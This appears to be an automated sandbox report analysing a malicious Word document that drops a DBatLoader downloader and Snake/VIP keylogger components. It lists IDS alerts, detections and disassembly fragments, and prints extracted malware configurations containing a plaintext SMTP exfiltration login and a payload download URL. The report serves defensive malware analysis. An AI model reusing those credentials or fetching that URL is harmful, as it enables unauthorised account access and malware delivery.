ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T08:08:25.579951+0100	2803305	3	Unknown Traffic	192.168.2.4	49758	104.21.16.1	443	TCP
2025-01-14T08:08:29.469167+0100	2803305	3	Unknown Traffic	192.168.2.4	52746	104.21.16.1	443	TCP
2025-01-14T08:08:30.931425+0100	2803305	3	Unknown Traffic	192.168.2.4	52748	104.21.16.1	443	TCP
2025-01-14T08:08:32.440891+0100	2803305	3	Unknown Traffic	192.168.2.4	52750	104.21.16.1	443	TCP
2025-01-14T08:08:33.939308+0100	2803305	3	Unknown Traffic	192.168.2.4	52752	104.21.16.1	443	TCP
2025-01-14T08:08:36.746760+0100	2803305	3	Unknown Traffic	192.168.2.4	52758	104.21.16.1	443	TCP
2025-01-14T08:08:36.820422+0100	2803305	3	Unknown Traffic	192.168.2.4	52759	104.21.16.1	443	TCP
2025-01-14T08:08:39.811236+0100	2803305	3	Unknown Traffic	192.168.2.4	52764	104.21.16.1	443	TCP
2025-01-14T08:08:43.220341+0100	2803305	3	Unknown Traffic	192.168.2.4	52769	104.21.16.1	443	TCP
2025-01-14T08:08:46.083888+0100	2803305	3	Unknown Traffic	192.168.2.4	52775	104.21.16.1	443	TCP
2025-01-14T08:08:47.545333+0100	2803305	3	Unknown Traffic	192.168.2.4	52779	104.21.16.1	443	TCP
2025-01-14T08:08:50.435647+0100	2803305	3	Unknown Traffic	192.168.2.4	52785	104.21.16.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T08:08:23.466369+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49754	132.226.8.169	80	TCP
2025-01-14T08:08:25.098612+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49754	132.226.8.169	80	TCP
2025-01-14T08:08:26.450742+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	52742	132.226.8.169	80	TCP
2025-01-14T08:08:34.729831+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	52753	132.226.8.169	80	TCP
2025-01-14T08:08:36.058488+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	52753	132.226.8.169	80	TCP
2025-01-14T08:08:37.619699+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	52760	132.226.8.169	80	TCP
2025-01-14T08:08:39.103479+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	52763	132.226.8.169	80	TCP
2025-01-14T08:08:43.943210+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	52768	132.226.8.169	80	TCP
2025-01-14T08:08:45.484581+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	52768	132.226.8.169	80	TCP
2025-01-14T08:08:46.974552+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	52777	132.226.8.169	80	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T08:08:37.751993+0100	1810007	1	Potentially Bad Traffic	192.168.2.4	52761	149.154.167.220	443	TCP
2025-01-14T08:08:48.846989+0100	1810007	1	Potentially Bad Traffic	192.168.2.4	52782	149.154.167.220	443	TCP
2025-01-14T08:08:57.208320+0100	1810007	1	Potentially Bad Traffic	192.168.2.4	52796	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: PI ITS15235.doc

Avira: detected

Found malware configuration

Source: 0000000E.00000002.3457231521.0000000021781000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "info@irco.com.sa", "Password": "info12A", "Host": "mail.irco.com.sa", "Port": "587", "Version": "4.4"}
Source: 10.2.npratlsN.pif.2dd40ee8.4.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "info@irco.com.sa", "Password": "info12A", "Host": "mail.irco.com.sa", "Port": "587"}
Source: 4.0.brightness.exe.400000.0.unpack	Malware Configuration Extractor: DBatLoader {"Download Url": ["https://amazonenviro.com/admin/245_Nsltarpncon"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Libraries\Nsltarpn.PIF	ReversingLabs: Detection: 47%
Source: C:\Windows \SysWOW64\NETUTILS.dll	ReversingLabs: Detection: 28%
Source: C:\Windows\SysWOW64\brightness.exe	ReversingLabs: Detection: 47%

Multi AV Scanner detection for submitted file

Source: PI ITS15235.doc	Virustotal: Detection: 59%			Perma Link
Source: PI ITS15235.doc	ReversingLabs: Detection: 57%

Machine Learning detection for dropped file

Source: C:\Windows \SysWOW64\NETUTILS.dll	Joe Sandbox ML: detected
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\brightness.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: PI ITS15235.doc

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\Public\Libraries\npratlsN.pif	Unpacked PE file: 10.2.npratlsN.pif.400000.0.unpack
Source: C:\Users\Public\Libraries\npratlsN.pif	Unpacked PE file: 14.2.npratlsN.pif.400000.0.unpack
Source: C:\Users\Public\Libraries\npratlsN.pif	Unpacked PE file: 16.2.npratlsN.pif.400000.0.unpack

Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49757 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:52744 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:52756 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:52771 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 192.168.2.4:52790 -> 104.21.16.1:443 version: TLS 1.0

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:52761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:52782 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:52796 version: TLS 1.2

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: brightness.exe, 00000004.00000002.1883329411.000000002064F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1831421420.000000007F300000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1883329411.00000000205D0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1890760472.000000007EFEF000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000D.00000002.1999576902.00000000206A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: brightness.exe, 00000004.00000002.1883329411.00000000205D0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1830497059.000000007F330000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1883329411.000000002061C000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000D.00000002.1999576902.00000000205E0000.00000004.00001000.00020000.00000000.sdmp, svchost.pif.4.dr
Source:	Binary string: _.pdb source: npratlsN.pif, 0000000A.00000002.3472158712.000000002DD40000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3462362371.000000002B449000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000003.1862021151.0000000029AEC000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.1988530377.000000001F96E000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3465440531.0000000023CC0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3456832626.00000000214B9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3464658722.000000002E310000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3456650715.000000002BB49000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000003.2059147464.0000000029E87000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: brightness.exe, 00000004.00000002.1883329411.00000000205D0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1851940223.0000000021362000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1830497059.000000007F330000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1851940223.0000000021391000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1883329411.000000002061C000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000D.00000002.1999576902.00000000205E0000.00000004.00001000.00020000.00000000.sdmp, svchost.pif.4.dr

Source: C:\Windows\SysWOW64\brightness.exe

Code function: 4_2_028F5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

4_2_028F5908

Software Vulnerabilities

Document exploit detected (creates forbidden files)

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Windows\SysWOW64\brightness.exe

Jump to behavior

Document exploit detected (drops PE files)

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File created: brightness.exe.0.dr

Jump to dropped file

Document exploit detected (process start blacklist hit)

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Process created: C:\Windows\SysWOW64\brightness.exe

Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	10_2_29A5DD08
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2E5CF2B5h	10_2_2E5CF0C9
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2E5CFC3Fh	10_2_2E5CF0C9
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2E5CE0C5h	10_2_2E5CDF07
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	10_2_2E5CE5E8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2E5CE0C5h	10_2_2E5CE114
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F6810E9h	10_2_2F680E38
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F68B829h	10_2_2F68B580
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F68185Dh	10_2_2F681440
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F68CDE1h	10_2_2F68CB38
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F68FDA9h	10_2_2F68FB00
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F68D691h	10_2_2F68D3E8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F68185Dh	10_2_2F68178B
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F68D239h	10_2_2F68CF90
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F68F4F9h	10_2_2F68F250
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F68C0D9h	10_2_2F68BE30
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F68C989h	10_2_2F68C6E0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F68F951h	10_2_2F68F6A8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F68C531h	10_2_2F68C288
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F68E7F1h	10_2_2F68E548
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F68F0A1h	10_2_2F68EDF8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F68BC81h	10_2_2F68B9D8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F68EC49h	10_2_2F68E9A0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F68DAE9h	10_2_2F68D840
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F68185Dh	10_2_2F681431
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F68E399h	10_2_2F68E0F0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F68DF41h	10_2_2F68DC98
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F6968FDh	10_2_2F6965C0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F69E0CEh	10_2_2F69DE00
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F697DC0h	10_2_2F697AF0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F692151h	10_2_2F691EA8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F69701Ah	10_2_2F696F69
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F696411h	10_2_2F696168
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F69FC2Eh	10_2_2F69F960
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F69701Ah	10_2_2F696F70
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F694019h	10_2_2F693D70
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F69DC3Eh	10_2_2F69D970
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F690FF1h	10_2_2F690D48
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F69AA0Eh	10_2_2F69A740
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F69E9EEh	10_2_2F69E720
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F69C9FEh	10_2_2F69C730
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F693BC1h	10_2_2F693918
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F695FB9h	10_2_2F695D10
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F6918A1h	10_2_2F6915F8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F694471h	10_2_2F6941C8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F69CE8Eh	10_2_2F69CBC0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F69AE9Eh	10_2_2F69ABD0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F691449h	10_2_2F6911A0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F69EE7Eh	10_2_2F69EBB0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then mov esp, ebp	10_2_2F699B8A
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F69BC4Eh	10_2_2F69B980
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F693311h	10_2_2F693068
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F69B32Eh	10_2_2F69B060
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F695709h	10_2_2F695460
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F694D21h	10_2_2F694A78
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F69F30Eh	10_2_2F69F040
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F6902E9h	10_2_2F690040
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F691CF9h	10_2_2F691A50
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F69D31Eh	10_2_2F69D050
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F6948C9h	10_2_2F694620
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F69C0DEh	10_2_2F69BE10
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F69D7AEh	10_2_2F69D4E0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F690B99h	10_2_2F6908F0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F69B7BEh	10_2_2F69B4F0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F693769h	10_2_2F6934C0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F69517Bh	10_2_2F694ED0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F69F79Eh	10_2_2F69F4D0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F69C56Eh	10_2_2F69C2A0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F695B61h	10_2_2F6958B8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F69A57Eh	10_2_2F69A2B0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F690741h	10_2_2F690498
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F69E55Eh	10_2_2F69E290
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F705730h	10_2_2F705438
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F70E6A0h	10_2_2F70E3A8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F70EB68h	10_2_2F70E870
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F704746h	10_2_2F704478
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F707D70h	10_2_2F707A78
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F700C07h	10_2_2F700960
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F709558h	10_2_2F709260
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F701E36h	10_2_2F701B68
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F70C060h	10_2_2F70BD68
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F70D848h	10_2_2F70D550
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F703E26h	10_2_2F703B58
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F706A50h	10_2_2F706758
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F70030Eh	10_2_2F700040
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F708238h	10_2_2F707F40
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F701516h	10_2_2F701248
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F70AD40h	10_2_2F70AA48
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F70C528h	10_2_2F70C230
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F703506h	10_2_2F703238
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F70F030h	10_2_2F70ED38
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F706F18h	10_2_2F706C20
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F709A20h	10_2_2F709728
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F70B208h	10_2_2F70AF10
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F702BE6h	10_2_2F702918
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F70DD10h	10_2_2F70DA18
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F705BF8h	10_2_2F705900
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F70F4F9h	10_2_2F70F200
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F704BD6h	10_2_2F704908
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F708700h	10_2_2F708408
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F709EE8h	10_2_2F709BF0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F7022C6h	10_2_2F701FF8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F70C9F0h	10_2_2F70C6F8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F70E1D8h	10_2_2F70DEE0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F7042B6h	10_2_2F703FE8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F7073E0h	10_2_2F7070E8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F70079Eh	10_2_2F7004D0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F708BC8h	10_2_2F7088D0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F7019A6h	10_2_2F7016D8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F70B6D0h	10_2_2F70B3D8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F70CEB8h	10_2_2F70CBC0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F703997h	10_2_2F7036C8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F7060C0h	10_2_2F705DC8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F70F9C0h	10_2_2F70F6C8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F7078A8h	10_2_2F7075B0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F701086h	10_2_2F700DB8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F70A3B0h	10_2_2F70A0B8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F70BB98h	10_2_2F70B8A0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F703076h	10_2_2F702DA8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F706588h	10_2_2F706290
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F705107h	10_2_2F704D98
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F709090h	10_2_2F708D98
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F70A878h	10_2_2F70A580
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F702756h	10_2_2F702488
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F70D380h	10_2_2F70D088
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F741190h	10_2_2F740E98
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F740800h	10_2_2F740508
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F740CC8h	10_2_2F7409D0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2F740338h	10_2_2F740040
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	10_2_2F760040
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	10_2_2F760037
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	10_2_2F760031
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	10_2_2FE24C9C
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	10_2_2FE27AC0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	10_2_2FE27A91
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	14_2_212EDD08
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2441F2B5h	14_2_2441F0C9
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2441FC3Fh	14_2_2441F0C9
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	14_2_2441E5E8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2441E0C5h	14_2_2441E114
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 2441E0C5h	14_2_2441DF07
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255DB829h	14_2_255DB580
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255D185Dh	14_2_255D1440
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255D10E9h	14_2_255D0E38
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255DE7F1h	14_2_255DE548
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255DBC81h	14_2_255DB9D8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255DF0A1h	14_2_255DEDF8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255DEC49h	14_2_255DE9A0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255DDAE9h	14_2_255DD840
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255D185Dh	14_2_255D1431
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255DE399h	14_2_255DE0F0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255DDF41h	14_2_255DDC98
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255DFDA9h	14_2_255DFB00
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255DCDE1h	14_2_255DCB38
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255DD691h	14_2_255DD3E8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255DD239h	14_2_255DCF90
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255D185Dh	14_2_255D178B
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255DF4F9h	14_2_255DF250
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255DC0D9h	14_2_255DBE30
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255DC989h	14_2_255DC6E0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255DC531h	14_2_255DC288
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255DF951h	14_2_255DF6A8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255E3BC1h	14_2_255E3918
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255E68FDh	14_2_255E65C0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255E7DC0h	14_2_255E7AF0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255EA57Eh	14_2_255EA2B0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255E0FF1h	14_2_255E0D48
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 255EAA0Eh	14_2_255EA740
